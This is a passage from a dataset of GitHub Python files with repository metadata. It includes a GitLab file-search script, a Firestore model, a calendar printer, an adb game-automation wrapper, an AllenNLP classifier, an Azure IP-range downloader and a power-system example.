filter_projects:\n projects = gl.projects.list(all=True)\n else:\n group_object = gl.groups.get(group)\n projects = []\n\n if filter_projects:\n group_projects = group_object.projects.list(search=project_filter, include_subgroups=True)\n else:\n group_projects = group_object.projects.list(all=True, include_subgroups=True)\n \n for group_project in group_projects:\n projects.append(gl.projects.get(group_project.id))\n\n if internal_debug:\n eprint(\"Number of projects that will be searched:\", len(projects))\n\n\n for project in projects:\n if internal_debug:\n if hasattr(project, 'path'):\n path = project.path\n else:\n path = project.name\n eprint(\"Project: \",path)\n\n files = []\n try:\n files = project.repository_tree(recursive=True, all=True)\n except Exception as e:\n print(str(e), \"Error getting tree in project:\", project.name)\n\n for file in files:\n if internal_debug:\n fpath = file.get('path',None) if file.get('path',None)!=None else file.get('name',None)\n eprint(\" File: \",fpath)\n\n if filename_regex:\n matches=re.findall(file_filter, file['name'])\n filename_matches = len(matches)>0\n else:\n filename_matches=file_filter == file['name']\n \n if filename_matches:\n file_content = project.files.raw(file_path=file['path'], ref='master')\n \n if text in str(file_content):\n return_value.append({\n \"project\": project.name,\n \"file\": file['path']\n })\n \n return return_value\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--api-debug\", action=\"store_true\", help=\"Show all API calls\")\n 
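# note: --internal-debug makes search() print every project and file it visits, which can be very noisy on large groups\n    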
parser.add_argument(\"--internal-debug\", action=\"store_true\", help=\"Show all iterated items and other debug info\")\n    parser.add_argument(\"--filename-is-regex\",action=\"store_true\", help=\"FILE_FILTER becomes a Python regular expression, so it can be '.*\\.cpp' to search for all files with extension cpp\")\n    parser.add_argument(\"GITLAB_SERVER\", nargs=1, help=\"URL of Gitlab server, eg. https://gitlab.com/\")\n    parser.add_argument(\"GITLAB_USER_TOKEN\", nargs=1, help=\"Access token with api_read access\")\n    parser.add_argument(\"FILE_FILTER\", nargs=1, help=\"Filter for filenames to search in\")\n    parser.add_argument(\"TEXT_TO_SEARCH\", nargs=1, help=\"Text to find in files\")\n    parser.add_argument(\"GROUP\", nargs='?', help=\"Group to search for projects in, can be subgroup eg. parent_group/subgroup/another_subgroup\")\n    parser.add_argument(\"PROJECT_FILTER\", nargs='?', help=\"Filter for project names to look into\")\n    args = parser.parse_args()\n\n    api_debug_arg = args.api_debug\n    internal_debug_arg = args.internal_debug\n    regex_arg = args.filename_is_regex\n    gitlab_server_arg = args.GITLAB_SERVER[0]\n    token_arg = args.GITLAB_USER_TOKEN[0]\n    file_filter_arg = args.FILE_FILTER[0]\n    text_arg = args.TEXT_TO_SEARCH[0]\n    group_arg = None if args.GROUP == None else args.GROUP\n    project_filter_arg = None if args.PROJECT_FILTER == None else args.PROJECT_FILTER\n\n    print(search(gitlab_server_arg, token_arg, file_filter_arg, text_arg, group_arg, project_filter_arg, api_debug_arg, internal_debug_arg, regex_arg))\n","repo_name":"danielskowronski/gitlab-search","sub_path":"gitlab-search.py","file_name":"gitlab-search.py","file_ext":"py","file_size_in_byte":4326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5138675202","text":"# pylint: disable=no-member\nfrom server.firebase import db, firestore\n\n\nclass Post:\n    \"Post model class\"\n\n    def __init__(self, pid: str = None) -> None:\n        self.doc = db.collection(\"posts\").document(pid)\n\n    @staticmethod\n    def get_posts_by_user_id(\n        uid: str = \"\", cursor=\"\", language: str = \"\", limit: int = 10\n    ):\n        \"Retrieve all posts created by a user id\"\n        posts = db.collection(\"posts\")\n\n        # Filter by user id\n        if uid:\n            posts = posts.where(\"user.uid\", \"==\", uid)\n\n        # Filter by code language\n        if language:\n            posts = posts.where(\"language\", \"==\", language)\n\n        # Sort by created at\n        posts = posts.order_by(\"created\", direction=firestore.Query.DESCENDING)\n\n        # Set the page offset\n        if cursor:\n            pagination_doc = db.collection(\"posts\").document(cursor).get()\n            posts = posts.start_after(pagination_doc)\n\n        posts = posts.limit(limit).stream()\n        return [post.to_dict() for post in posts]\n\n    @staticmethod\n    def get_saved_posts_by_user_id(uid: str, cursor=None, limit: int = 10):\n        \"Retrieve all posts saved by a user id\"\n        posts = db.collection(\"user_posts\").document(uid).collection(\"saved\")\n        # Set the page offset\n        if cursor:\n            pagination_doc = (\n                db.collection(\"user_posts\")\n                .document(uid)\n                .collection(\"saved\")\n                .document(cursor)\n                .get()\n            )\n            posts = posts.start_after(pagination_doc)\n\n        posts = posts.limit(limit).stream()\n        return [post.to_dict() for post in posts]\n\n    def get(self):\n        \"Get a post document\"\n        return self.doc.get()\n\n    def update(self, data: dict):\n        \"Update a post document\"\n        data['preview'] = self.get_preview()\n        self.doc.update(data)\n        return self.doc.get()\n\n    def delete(self):\n        \"Delete a post document\"\n        self.doc.delete()\n        return 
self\n\n def save(self, uid: str):\n \"Save a post document\"\n doc = (\n db.collection(\"user_posts\")\n .document(uid)\n .collection(\"saved\")\n .document(self.doc.id)\n )\n doc.set({\"id\": self.doc.id})\n return self\n\n def unsave(self, uid: str):\n \"Save a post document\"\n doc = (\n db.collection(\"user_posts\")\n .document(uid)\n .collection(\"saved\")\n .document(self.doc.id)\n )\n doc.delete()\n return self\n\n def get_link(self):\n return f\"/posts/{self.doc.id}\"\n\n @staticmethod\n def preview_url(post_id: str):\n return f\"https://firebasestorage.googleapis.com/v0/b/codeblocks-991a2.appspot.com/o/{post_id}.png?alt=media\"\n\n def get_preview(self):\n return Post.preview_url(self.doc.id)\n","repo_name":"adrian2x/codeblocks","sub_path":"server/models/post.py","file_name":"post.py","file_ext":"py","file_size_in_byte":2870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28849682804","text":"N = int(input())\nA = list(map(int, input().split()))\nQ = int(input())\nB = []\nfor _ in range(Q):\n B.append(list(map(int, input().split())))\n\n\nd = [0]*(10**5+1)\nans = 0\nfor i in range(N):\n d[A[i]] += 1\n ans += A[i]\n\nfor j in range(Q):\n ans = ans - d[B[j][0]]*B[j][0] + d[B[j][0]]*B[j][1]\n d[B[j][1]] += d[B[j][0]]\n d[B[j][0]] = 0\n print(ans)\n","repo_name":"kentahoriuchi/Atcorder","sub_path":"ABC171/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13880984044","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\nimport gzip \nimport math\nimport sys\nimport time\nimport datetime\nimport string\nimport re\nimport operator\nimport pickle\nimport os\nimport math\nimport csv\nimport numpy as np\nimport cPickle\nfrom collections import defaultdict\nfrom nltk.tokenize import word_tokenize\nimport sys, re, os\nimport pandas as pd\nfrom pandas import Series, DataFrame\nimport random\n#import cPickle\nreload(sys) #python2.7\n#from imp import reload#python3.0\n# this code used to generate a dict which instore the documents by sentence and sentence from the big dict key is docno and value is the whole text\n\ndef saveObjToFile(FileName,obj):\n\tfw = open(FileName,\"wb\")\n\tpickle.dump(obj,fw,protocol=2)\n\tfw.close()\n\n\ndef get_S(stopwords_file):\n\tList = []\n\tSFile = open(stopwords_file,\"rb\")\n\tLines = SFile.readlines()\n\t#print Lines\n\tfor line in Lines:\n\t\t#print line\n\t\t#print line.strip()\n\t\tList.append(line.strip())\n\treturn List\n\ndef add_unknown_words(word_vecs, vocab, min_df=1, k=300):\n\tfor word in vocab:\n\t\tif word not in word_vecs and vocab[word] >= min_df:\n\t\t\tword_vecs[word] = np.random.uniform(-0.25,0.25,k) \n\ndef clean_str(string, TREC=False):\n\tstring = re.sub(r\"[^A-Za-z0-9(),!?\\'\\`]\", \" \", string) \n\tstring = re.sub(r\"\\'s\", \" \\'s\", string) \n\tstring = re.sub(r\"\\'ve\", \" \\'ve\", string) \n\tstring = re.sub(r\"n\\'t\", \" n\\'t\", string) \n\tstring = re.sub(r\"\\'re\", \" \\'re\", string) \n\tstring = re.sub(r\"\\'d\", \" \\'d\", string) \n\tstring = re.sub(r\"\\'ll\", \" \\'ll\", string) \n\t#string = re.sub(r\",\", \" , \", string) \n\tstring = re.sub(r\"!\", \" ! \", string) \n\tstring = re.sub(r\"\\(\", \" \\( \", string) \n\tstring = re.sub(r\"\\)\", \" \\) \", string) \n\tstring = re.sub(r\"\\?\", \" \\? 
\", string)\n\tstring = re.sub(r\"\\*\", \" \\* \", string) \n\tstring = re.sub(r\"\\s{2,}\", \" \", string) \n\treturn string.strip() if TREC else string.strip().lower()\n\ndef clean_str_sst(string):\n\tstring = re.sub(r\"[^A-Za-z0-9().,!?\\'\\`]\", \" \", string) \n\tstring = re.sub(r\"\\s{2,}\", \" \", string) \n\treturn string.strip().lower()\n\n\ndef exer(clean_string=True):\n\tstopwords_file = \"/home/echo/Documents/word2vec/CNN_keras_demo/stopword-list.txt\"\n\tSList = get_S(stopwords_file)\n\tfilepath = \"/home/echo/Documents/WT2G/WT01/DOCs_TEXT_Dict\"\n\tDict = pickle.load(open(filepath,\"rb\"))\n\tcount = 0\n\tvocab = defaultdict(float)\n\tfor key,value in Dict.items():\n\t\tcount = count +1\n\t\tif (count<3):\n\t\t\t#print key\n\t\t\tcnt = 0\n\t\t\tfor line ,sent in value.items():\n\t\t\t\trev = []\n\t\t\t\trev.append(sent.strip())\n\t\t\t\tif clean_string:\n\t\t\t\t\torig_rev = clean_str(\" \".join(rev))\n\t\t\t\telse:\n\t\t\t\t\torig_rev = \" \".join(rev).lower()\n\t\t\t\torig_rev_list= orig_rev.split()\n\t\t\t\tnew_list = [w for w in orig_rev_list if not w in SList]\n\t\t\t\torig_rev_new =\" \".join(new_list)\n\t\t\t\twords = set(orig_rev_new.split())\n\t\t\t\tfor word in words:\n\t\t\t\t\tvocab[word] += 1\n\t\t\t\tdatum = {\"y\":1,\"docname\":key,\"line_num\":line, \"text\": orig_rev_new, \"num_words\": len(orig_rev_new.split())}\n\n\t\n\t\n\t\n\t\n\t\nif __name__ == \"__main__\":\n\tFilepath = \"/home/echo/Documents/word2vec/CNN_keras_demo/query_docs/\"\n\t'''DocsDict= pickle.load(open(\"/home/echo/Documents/word2vec/CNN_keras_demo/DocsDict\",\"rb\"))\n\t#key is target docnos(WT02-B33-20_1) not whole docno of corpus ,value is dict (key is word,value is tf og word)\n\tDocsLen= pickle.load(open(\"/home/echo/Documents/word2vec/CNN_keras_demo/DocsLen\",\"rb\"))\n\t#key is docno:\"WT01-B11-196\",value is the length of docno without stopwords and repeated words but not stemmed\n\tDocFrqDict = pickle.load(open(\"/home/echo/Documents/WT2G/Sentence/WordTDF_Dict\",\"rb\"))\n\t#key is word,value is number of docments which words appeared\n\tnumberOfDocuments = len(DocsLen)\n\taverageDocumentLength = sum(DocsLen.values())/len(DocsLen)#'''\n\t#Score_Window(FilePath,DocsDict,DocsLen,DocFrqDict,numberOfDocuments,averageDocumentLength)\n\t#exer()\n\t#Score_WindowN(Filepath)\n\texer(clean_string=True)\n\t\n","repo_name":"YuanyuanQi/Python_W2V_WT2G","sub_path":"GetSents_all_wt2g.py","file_name":"GetSents_all_wt2g.py","file_ext":"py","file_size_in_byte":3803,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"27966179207","text":"#=========================================\n#Roosevelt Bannerman\n#Fundamental Programming in Bioinformatics\n#Calendar\n#=========================================\n\nglobal months, weekdays,days, nullString, dashString, NUM_MONTHS,NUM_WEEKDAYS\n\nmonths = (\"January\",\"Feburary\",\"March\",\"April\",\"May\",\"June\",\"July\",\"August\",\"September\",\"October\",\"November\",\"December\")\nweekdays = (\"Su\",\"Mo\",\"Tu\",\"We\",\"Th\",\"Fr\",\"Sa\")\ndays = [31,28,31,30,31,30,31,31,30,31,30,31]\nnullString = \"\\0\" * 28\ndashString = '-' * 28\nNUM_MONTHS = 12\nNUM_WEEKDAYS = 7\n\n#=========================================\n#Obtains the year from the user\n#Returns the year\n#=========================================\ndef obtainYear():\n isValid = False\n while(not isValid):\n print(\"\\n\\tPlease enter a year from 1900 to 2016 : \", end='')\n year = input()\n isValid = True\n if(not year.isdigit()):\n 
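# non-numeric input: mark this attempt invalid so the loop prompts again\n            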
isValid = False\n continue\n year = int(year)\n if(year < 1900 or year > 2016):\n isValid = False\n \n return year\n\n#=========================================\n#Recieves the entered year\n#Returns whether the year is a leap year\n#=========================================\ndef isLeap(year):\n if(year % 4 == 0):\n if(year % 100 == 0):\n if(year % 400 == 0):\n return True\n return False\n return True\n return False\n\n#=========================================\n#Recieves the entered year\n#Calculates the number of leap years since 1900\n#Returns the number of leap years\n#=========================================\ndef calculateLeaps(year):\n totalLeaps = 0\n\n for i in range(1900,year):\n if(i % 4 == 0):\n if(i % 100 == 0):\n if(i % 400 == 0):\n totalLeaps += 1\n continue\n totalLeaps += 1\n continue;\n return totalLeaps\n\n#=========================================\n#Recieves the entered year and the total number of leap years\n#Calculates the first day of the entered year\n#Returns the integer for the first day of the entered year\n#=========================================\ndef calculateDayOne(year,leaps):\n\n difference = year - 1900\n days = (difference * 365) + leaps\n \n return(days % NUM_WEEKDAYS)\n\n#=========================================\n#Recieves the entered year and the first day of the year\n#Displays the calendar for the entered year\n#=========================================\ndef displayResults(year,start):\n counter = start + 1\n if(counter == NUM_WEEKDAYS):\n counter = 0\n\n for currentMonth in range(12):\n spacing = int(((23 - len(months[currentMonth]))/2)) * ' '\n print(\"\\n\" + spacing + months[currentMonth] + \" \" + str(year))\n\n for day in weekdays:\n print(\" \" + day,end='')\n \n print(\"\\n\" + dashString)\n\n start = (0 + (4*counter)) * ' '\n print(start,end='')\n \n for currentDay in range(1,days[currentMonth]+1):\n if(currentDay > 9):\n print(\" \" + str(currentDay),end='')\n counter += 1\n if(counter == NUM_WEEKDAYS):\n if(currentDay != days[currentMonth]):\n print()\n counter = 0\n else:\n print(\" \" + str(currentDay),end='')\n counter += 1\n if(counter == NUM_WEEKDAYS):\n if(currentDay != days[currentMonth]):\n print()\n counter = 0\n print() \n print() \n \n\n \n#=========================================\n#Executes the Program\n#=========================================\ndef runProgram():\n year = obtainYear()\n if(isLeap(year)):\n days[1] = 29\n totalLeaps = calculateLeaps(year)\n dayOne = calculateDayOne(year,totalLeaps)\n displayResults(year,dayOne)\n stop = input()\n\nrunProgram()\n\n\n\n\n\n\n\n","repo_name":"HarrisonBannerman/Calendar_Program","sub_path":"Calendar.py","file_name":"Calendar.py","file_ext":"py","file_size_in_byte":3955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31368453457","text":"\"\"\"\n@author '彼时思默'\n@time 2019/12/7 13:16\n@describe:\n 通过adb.exe操纵Android\n\"\"\"\nimport subprocess\n\nfrom config import tap\nfrom loguru import logger\n\n\nclass AdbNio:\n def __init__(self):\n cmd = 'adb devices'\n statue = self._exe(cmd)\n if 'cannot connect to' in statue:\n cmd = f'adb connect 127.0.0.1:7555'\n self._exe(cmd)\n\n def _exe(self, cmd):\n logger.debug(cmd)\n connect = subprocess.Popen(cmd, stderr=subprocess.PIPE, stdout=subprocess.PIPE,\n shell=True)\n if 'screencap' in cmd:\n return connect.stdout.read()\n stdout = connect.stdout.read().decode('utf8')\n # if stdout != '':\n # logger.debug(stdout)\n return stdout\n\n def run_app(self, 
name='com.cig.themonsterchef'):\n # com.cig.themonsterchef\n cmd = f'adb shell am start -n {name}'\n self._exe(cmd)\n\n def shot_screen(self):\n cmd = f'adb shell screencap -p'\n out_origin = self._exe(cmd)\n out = out_origin.replace(b'\\r\\n', b'\\n')\n # with open(f'{root}/temp/sc.png', 'wb')as file:\n # file.write(out)\n return out\n\n\n def tap(self, x, y):\n cmd = f'adb shell input tap {x} {y}'\n self._exe(cmd)\n\n def swipe(self, start_x, start_y, end_x, end_y, delay=500):\n cmd = f'adb shell input swipe {start_x} {start_y} {end_x} {end_y} {delay}'\n self._exe(cmd)\n\n def tap_long(self, start_x, start_y, delay=500):\n cmd = f'adb shell input swipe {start_x} {start_y} {start_x} {start_y} {delay}'\n self._exe(cmd)\n\n\nadb = AdbNio()\n\nif __name__ == '__main__':\n # pic = adb.shot_screen()\n # with open('../temp/sc.png', 'wb')as file:\n # file.write(pic)\n # adb.tap(450, 313)\n # adb.tap_long(*tap.XY_close_video_58, 1000)\n adb.tap(*tap.XY_close_video_58)\n","repo_name":"bishisimo/game_helper","sub_path":"utils/adb.py","file_name":"adb.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41018933372","text":"import torch\nimport torch.nn\nimport torch.nn.functional as F\nimport numpy\n\nfrom typing import Optional, Dict\nfrom overrides import overrides\n\nfrom allennlp.common import Params\nfrom allennlp.common.checks import ConfigurationError\nfrom allennlp.data import Vocabulary\nfrom allennlp.modules import FeedForward, Seq2VecEncoder, TextFieldEmbedder\nfrom allennlp.models.model import Model\nfrom allennlp.nn import InitializerApplicator, RegularizerApplicator\nfrom allennlp.nn import util\nfrom allennlp.training.metrics import CategoricalAccuracy, F1Measure\n\n\n@Model.register(\"dialogue_context_coherence_classifier\")\nclass DialogueContextCoherenceClassifier(Model):\n\n def __init__(self,\n vocab: Vocabulary,\n text_field_embedder: TextFieldEmbedder,\n context_encoder: Seq2VecEncoder,\n response_encoder: Seq2VecEncoder,\n classifier_feedforward: FeedForward,\n initializer: InitializerApplicator = InitializerApplicator(),\n regularizer: Optional[RegularizerApplicator] = None) -> None:\n super(DialogueContextCoherenceClassifier, self).__init__(vocab, regularizer)\n\n self.text_field_embedder = text_field_embedder\n self.num_classes = vocab.get_vocab_size(\"labels\")\n self.context_encoder = context_encoder\n self.response_encoder = response_encoder\n self.classifier_feedforward = classifier_feedforward\n labels = self.vocab.get_index_to_token_vocabulary('labels')\n pos_label_index = list(labels.keys())[list(labels.values()).index('neg')]\n self.metrics = {\n \"accuracy\": CategoricalAccuracy()\n # \"f1\": F1Measure(positive_label=pos_label_index)\n }\n self.loss = torch.nn.CrossEntropyLoss()\n initializer(self)\n\n @overrides\n def forward(self,\n context: Dict[str, torch.LongTensor],\n response: Dict[str, torch.LongTensor],\n label: torch.LongTensor = None) -> Dict[str, torch.Tensor]:\n embedded_context = self.text_field_embedder(context)\n encoded_context = self.context_encoder(\n embedded_context,\n util.get_text_field_mask(context))\n\n encoded_response = self.response_encoder(\n self.text_field_embedder(response),\n util.get_text_field_mask(response))\n\n logits = self.classifier_feedforward(torch.cat([encoded_context, encoded_response], dim=-1))\n\n class_probs = F.softmax(logits, dim=-1)\n\n output_dict = {\"class_probabilities\": class_probs}\n\n if label is not 
None:\n loss = self.loss(logits, label.squeeze(-1))\n for metric in self.metrics.values():\n metric(logits, label.squeeze(-1))\n output_dict['loss'] = loss\n\n return output_dict\n\n @overrides\n def get_metrics(self, reset: bool = False) -> Dict[str, float]:\n # precision, recall, f1 = self.metrics[\"f1\"].get_metric(reset)\n # metrics = {\"accuracy\": self.metrics[\"accuracy\"].get_metric(reset),\n # \"precision:\": precision,\n # \"recall\": recall,\n # \"f1\": f1}\n # return metrics\n return {metric_name: metric.get_metric(reset) for metric_name, metric in self.metrics.items()}\n\n @overrides\n def decode(self, output_dict: Dict[str, torch.Tensor]) -> Dict[str, torch.Tensor]:\n predictions = output_dict[\"class_probabilities\"].cpu().data.numpy()\n argmax_indices = numpy.argmax(predictions, axis=-1)\n labels = [self.vocab.get_token_from_index(x, namespace=\"labels\") for x in argmax_indices]\n output_dict['label'] = labels\n return output_dict\n\n @classmethod\n def from_params(cls, vocab: Vocabulary, params: Params) -> 'DialogueContextCoherenceClassifier':\n embedder_params = params.pop(\"text_field_embedder\")\n text_field_embedder = TextFieldEmbedder.from_params(vocab, embedder_params)\n context_encoder = Seq2VecEncoder.from_params(params.pop(\"context_encoder\"))\n response_encoder = Seq2VecEncoder.from_params(params.pop(\"response_encoder\"))\n classifier_feedforward = FeedForward.from_params(params.pop(\"classifier_feedforward\"))\n\n initializer = InitializerApplicator.from_params(params.pop(\"initializer\", []))\n regularizer = RegularizerApplicator.from_params(params.pop(\"regularizer\", []))\n\n return cls(vocab=vocab,\n text_field_embedder=text_field_embedder,\n context_encoder=context_encoder,\n response_encoder=response_encoder,\n classifier_feedforward=classifier_feedforward,\n initializer=initializer,\n regularizer=regularizer)\n","repo_name":"XinnuoXu/DRank","sub_path":"supervised_learning/discriminator/coherence/models/dialogue_context_coherence_classifier.py","file_name":"dialogue_context_coherence_classifier.py","file_ext":"py","file_size_in_byte":4766,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"43709939425","text":"\"\"\"\r\n#判断基数偶数\r\n\r\n输入说明:\r\n输入一个整数\r\n输出说明:\r\n输出奇数或偶数\r\n输入范例:\r\n3\r\n输出范例:\r\nodd\r\n输入范例:\r\n6\r\n输出范例:\r\neven\r\n\"\"\"\r\na=int(input())\r\n\r\nif a%2==0:\r\n print(\"even\")\r\nelse:\r\n print(\"odd\")","repo_name":"Andersonabc/practice_Python","sub_path":"week1-4.py","file_name":"week1-4.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42121330337","text":"from relsad.examples.tutorial.system_components import *\n\nfrom relsad.network.systems import (\n PowerSystem,\n Transmission,\n Distribution,\n)\n\nfrom relsad.load.bus import CostFunction\n\nfrom relsad.visualization.plotting import plot_topology\n\nimport os\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\nload_household = np.ones(365 * 24) * 0.05 # MW\n\nhousehold = CostFunction(\n A=8.8,\n B=14.7,\n)\n\nB2.add_load_data(\n pload_data=load_household,\n cost_function=household,\n)\n\nB3.add_load_data(\n pload_data=load_household,\n cost_function=household,\n)\n\n\nps = PowerSystem(controller=C1)\n\ntn = Transmission(\n parent_network=ps,\n trafo_bus=B1,\n)\n\ndn = Distribution(\n parent_network=tn,\n connected_line=L1,\n)\ndn.add_buses([B2, B3, B4, B5, B6])\ndn.add_lines([L2, L3, L4, 
L5, L6])\n\nfig = plot_topology(\n buses=ps.buses,\n lines=ps.lines,\n bus_text=True,\n line_text=True,\n)\n\nfig.savefig(\n \"test_network.png\",\n dpi=600,\n)\nos.remove(\"test_network.png\")\n","repo_name":"stinefm/relsad","sub_path":"relsad/examples/tutorial/system.py","file_name":"system.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"21"} +{"seq_id":"24931700585","text":"#!/usr/bin/python3\n\nimport requests,json,re\n\nprint(\"[+] Azure ip range downloader\")\n\ndef request_wrapper(url, headers={}):\n\n for i in range(1,4):\n r=requests.get(url,headers=headers)\n if r.status_code==200:\n print(\"[+] Got %s successfully!\"%(url))\n break\n if i==3:\n print(\"[!] Failed to get %s.\"%(url))\n exit(2)\n print(\"[!] Getting %s failed(%i/3)\"%(url,i))\n\n return r.text\n\nua_dict=json.loads(request_wrapper(\"https://www.useragents.me/api\"))\n\nbest_ua = ua_dict[\"data\"][0]['ua']\n\ncontents=request_wrapper(\"https://www.microsoft.com/en-us/download/details.aspx?id=56519\",headers={\"User-Agent\":best_ua})\n\ndownload_url=re.findall(r\"https:\\/\\/download.microsoft.com\\/download\\/.*?\\.json\",contents)[0]\n\nazure_ips=json.loads(request_wrapper(download_url))['values']\n\nazure_ipv4=[]\nazure_ipv6=[]\n\nfor i in azure_ips:\n for j in i[\"properties\"][\"addressPrefixes\"]:\n if \".\" in j:\n azure_ipv4.append(j)\n if \":\" in j:\n azure_ipv6.append(j)\n\nazure_ipv4=list(dict.fromkeys(azure_ipv4))\nazure_ipv6=list(dict.fromkeys(azure_ipv6))\n\nif len(azure_ipv4) > 0:\n content=\"\\n\".join(azure_ipv4)\n open(\"sources/ips/azure-ips-ipv4.txt\",'w').write(content)\n\nif len(azure_ipv6) > 0:\n content=\"\\n\".join(azure_ipv6)\n open(\"sources/ips/azure-ips-ipv6.txt\",'w').write(content)\n","repo_name":"molangning/fire-av","sub_path":"scripts/get-azure-ranges.py","file_name":"get-azure-ranges.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"6405659824","text":"from unccalumni.web.dash.Basic import Basic\nfrom unccalumni.plotting_constants import THEME ,ColorPalette\nfrom unccalumni.utils import DataFrameService\n\nimport dash_bootstrap_components as dbc\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\n\nfrom plotnine import *\n\nimport logging\nimport pandas as pd\nimport numpy as np\nimport random\nimport json\nimport geopandas\nimport pdb\n\n\nlogging.basicConfig(level = logging.INFO)\n\nclass Scores(Basic):\n \"\"\"\n Creates the Test Scores Dashboard.\n It inherits the `Basic` class and overrides `_filteredDf` and `_chart` methods\n \"\"\"\n class HTML_IDS:\n SCORE_DROPDOWN = \"score_dropdown\"\n\n def __init__(self,route,flaskApp):\n self.score_columns = DataFrameService().get_score_columns()\n super().__init__(route,flaskApp , \"Scores\")\n\n def filteredDf(self,checklist , year_checklist , program_checklist , scores_column):\n return super().filteredDf(checklist , year_checklist , program_checklist )\n\n def chart(self,dfs,checklist,year_checklist , program_checklist,scores_column):\n print(scores_column)\n if dfs is None:\n return self.getErrorPlot(self.ERROR_MSG)\n\n df , geo_df = dfs\n\n score_df = df\n p = (\n ggplot(score_df[~score_df[scores_column].isna()] , aes(x=scores_column, fill=\"APP_FINAL_DECISION\") )\n + geom_density(alpha=0.5)\n + 
geom_vline(score_df.groupby([\"APP_FINAL_DECISION\"])[scores_column].mean().reset_index(name=\"mean_score\")\n , aes(xintercept = \"mean_score\" ,color=\"APP_FINAL_DECISION\"))\n + scale_x_continuous(limits=(score_df[scores_column].quantile(0.01),score_df[scores_column].quantile(.95)))\n + scale_fill_manual(values= ColorPalette.mapRandomColors(score_df[\"APP_FINAL_DECISION\"]))\n + scale_color_manual(values= ColorPalette.mapRandomColors(score_df[\"APP_FINAL_DECISION\"]))\n + theme_bw()\n + theme(figure_size=(15,5) , panel_border=element_blank())\n + ggtitle(scores_column)\n + ylab(\" \")\n + annotate(\"text\" , x=168 , y= 0.1 , label=\"Mean Lines\")\n )\n return [p]\n\n def makePlotImgsLayout(self, imgs):\n return html.Div(className=\"dash-container container p-0 m-0\", children=[\n html.Div(className=\"row\" ,children=[\n html.Div(className=\"col-md-12\" , children = [imgs[0]])\n ])\n # ,\n # html.Div(className=\"row\" ,children=[\n # html.Div(className=\"col-md-12\" , children = [imgs[1]])\n # ])\n\n ])\n\n def setupCallBacks(self):\n @self.app.callback(\n Output(component_id=Basic.HTML_IDS.IMG, component_property='children'),\n [Input(component_id=Basic.HTML_IDS.CHECKLIST, component_property='value')\n ,Input(component_id=Basic.HTML_IDS.YEAR_CHECKLIST, component_property='value')\n ,Input(component_id=Basic.HTML_IDS.PROGRAM_CHECKLIST, component_property='value')\n ,Input(component_id=Scores.HTML_IDS.SCORE_DROPDOWN, component_property='value')]\n )\n def filter_based_on_checklist_callback(checklist , year_checklist ,program_checklist , scores_column):\n return self.filter_based_on_checklist(checklist = checklist\n , year_checklist =year_checklist\n ,program_checklist=program_checklist\n , scores_column=scores_column)\n\n def makeInputLayout(self):\n parentInputs = super().makeInputLayout()\n return html.Div(className=\"row\", children=[\n html.Div(className=\"col-md-12\" ,children=[\n html.Div(className=\"fluid-row\", children=[\n dcc.Dropdown(id=Scores.HTML_IDS.SCORE_DROPDOWN ,\n options=[{\"label\" : v , \"value\" : v} for v in self.score_columns],\n value=self.score_columns[0])\n ]),\n parentInputs\n ])\n ])\n","repo_name":"abhijeetdtu/unccalumni","sub_path":"unccalumni/web/dash/Scores.py","file_name":"Scores.py","file_ext":"py","file_size_in_byte":4078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70014922612","text":"#!/usr/bin python3\r\n\r\nfrom abc import ABC, abstractmethod\r\nimport pathlib\r\nimport shutil\r\nimport os\r\n\r\nimport casadi as ca\r\n\r\nfrom barcgp.dynamics.models.model_types import ModelConfig\r\n\r\nclass AbstractModel(ABC):\r\n '''\r\n Base class for models\r\n Controllers may differ widely in terms of algorithm runtime and setup however\r\n for interchangeability controllers should implement a set of standard runtime methods:\r\n '''\r\n def __init__(self, model_config: ModelConfig):\r\n self.model_config = model_config\r\n \r\n if not model_config.enable_jacobians:\r\n jac_opts = dict(enable_fd=False, enable_jacobian=False, enable_forward=False, enable_reverse=False)\r\n else:\r\n jac_opts = dict()\r\n self.options = lambda fn_name: dict(jit=False, **jac_opts)\r\n\r\n @abstractmethod\r\n def step(self):\r\n pass\r\n\r\n # Method for installing generated files\r\n def install(self, dest_dir: str=None, src_dir: str=None, verbose=False):\r\n # If no target directory is provided, try to install a directory with\r\n # the same name as the model name in the current directory\r\n if src_dir is 
